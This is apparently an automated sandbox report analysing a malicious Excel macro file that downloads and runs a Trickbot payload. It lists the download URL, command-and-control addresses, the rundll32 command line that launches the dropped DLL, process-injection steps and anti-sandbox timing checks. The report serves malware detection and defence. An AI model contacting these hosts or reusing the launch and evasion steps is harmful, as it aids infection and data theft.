                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2087666935.000000006E899000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00311BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00311C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00311CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FD0F0 push 8B48D233h; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\System32\wermgr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,threadDelayed,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 00000000000EEAD0 second address: 00000000000EEAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007FA4F88B1640h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007FA4F88A94D6h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000EEAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E1290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E46F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000EEAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F3070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E88B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E88B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E887DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00102060 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: E0000 protect: page execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: E0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FFCB93F8
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: wermgr.exe, 00000006.00000002.2347584779.00000000007D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2347584779.00000000007D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2347584779.00000000007D0000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000003.2082507822.0000000000684000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2082501308.0000000000684000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2086800503.00000000008C8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2086715316.0000000000650000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2086590346.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000003.2082507822.0000000000684000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2082501308.0000000000684000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2086800503.00000000008C8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2086715316.0000000000650000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2086590346.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection212Disable or Modify Tools2LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Extra Window Memory Injection1Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSSystem Network Configuration Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 355607 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 20/02/2021 Architecture: WINDOWS Score: 100 29 ident.me 2->29 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Antivirus detection for URL or domain 2->47 49 Found malicious Excel 4.0 Macro 2->49 51 7 other signatures 2->51 9 EXCEL.EXE 84 41 2->9         started        signatures3 process4 dnsIp5 37 chipmania.it 185.81.0.78, 49165, 80 SERVERPLAN-ASIT Italy 9->37 39 www.chipmania.it 9->39 25 C:\Users\user\BASE.BABAA, PE32 9->25 dropped 27 C:\Users\user\AppData\Local\...\8[1].jjkes, PE32 9->27 dropped 57 Document exploit detected (process start blacklist hit) 9->57 59 Document exploit detected (UrlDownloadToFile) 9->59 14 rundll32.exe 9->14         started        file6 signatures7 process8 process9 16 rundll32.exe 14->16         started        signatures10 41 Writes to foreign memory regions 16->41 43 Allocates memory in foreign processes 16->43 19 wermgr.exe 16->19         started        22 wermgr.exe 4 2 16->22         started        process11 dnsIp12 53 Tries to detect virtualization through RDTSC time measurements 19->53 55 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 19->55 31 200.52.147.93, 443 RedesyTelecomunicacionesHN Honduras 22->31 33 94.140.114.136, 443 NANO-ASLV Latvia 22->33 35 3 other IPs or domains 22->35 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls7%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes11%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes6%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA11%MetadefenderBrowse
                C:\Users\user\BASE.BABAA6%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                ident.me0%VirustotalBrowse
                chipmania.it1%VirustotalBrowse
                www.chipmania.it2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                https://194.5.249.156/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/0%Avira URL Cloudsafe
                https://45.155.173.242/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/0%Avira URL Cloudsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://www.chipmania.it/mails/open.php5%VirustotalBrowse
                http://www.chipmania.it/mails/open.php100%Avira URL Cloudmalware
                https://142.202.191.164/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                https://200.52.147.93/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ident.me
                176.58.123.25
                truefalseunknown
                chipmania.it
                185.81.0.78
                truefalseunknown
                www.chipmania.it
                unknown
                unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.chipmania.it/mails/open.phptrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpfalse
                  high
                  http://www.windows.com/pctv.wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpfalse
                    high
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpfalse
                      high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://194.5.249.156/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/wermgr.exe, 00000006.00000002.2347564361.000000000039F000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.wermgr.exe, 00000006.00000002.2352219199.0000000033720000.00000002.00000001.sdmpfalse
                          high
                          http://crl.entrust.net/server1.crl0wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                            high
                            https://45.155.173.242/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/wermgr.exe, 00000006.00000002.2347558185.000000000038D000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net03wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://investor.msn.com/rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpfalse
                              high
                              https://142.202.191.164/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.%s.comPAwermgr.exe, 00000006.00000002.2352219199.0000000033720000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.diginotar.nl/cps/pkioverheid0wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpfalse
                                high
                                http://ocsp.entrust.net0Dwermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://secure.comodo.com/CPS0wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                                  high
                                  http://servername/isapibackend.dllwermgr.exe, 00000006.00000002.2353002125.00000000341D0000.00000002.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://crl.entrust.net/2048ca.crl0wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpfalse
                                    high
                                    https://200.52.147.93/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/wermgr.exe, 00000006.00000002.2347516377.000000000031A000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2347500342.00000000002EE000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.202.191.164
                                    unknownReserved
                                    398019DYNUUStrue
                                    45.155.173.242
                                    unknownGermany
                                    30823COMBAHTONcombahtonGmbHDEtrue
                                    185.81.0.78
                                    unknownItaly
                                    52030SERVERPLAN-ASITfalse
                                    194.5.249.156
                                    unknownRomania
                                    64398NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLROfalse
                                    200.52.147.93
                                    unknownHonduras
                                    27932RedesyTelecomunicacionesHNtrue
                                    94.140.114.136
                                    unknownLatvia
                                    43513NANO-ASLVtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:355607
                                    Start date:20.02.2021
                                    Start time:03:19:19
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 4s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189 (renamed file extension from 29189 to xls)
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@9/11@3/6
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 6.2% (good quality ratio 4.8%)
                                    • Quality average: 72%
                                    • Quality standard deviation: 41%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:19:40API Interceptor1x Sleep call for process: rundll32.exe modified
                                    03:19:40API Interceptor4x Sleep call for process: wermgr.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    142.202.191.164SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                      SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                        SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                          SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                            SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                              SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                      Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                        Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Exploit.Siggen3.10048.926.xlsGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                  upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
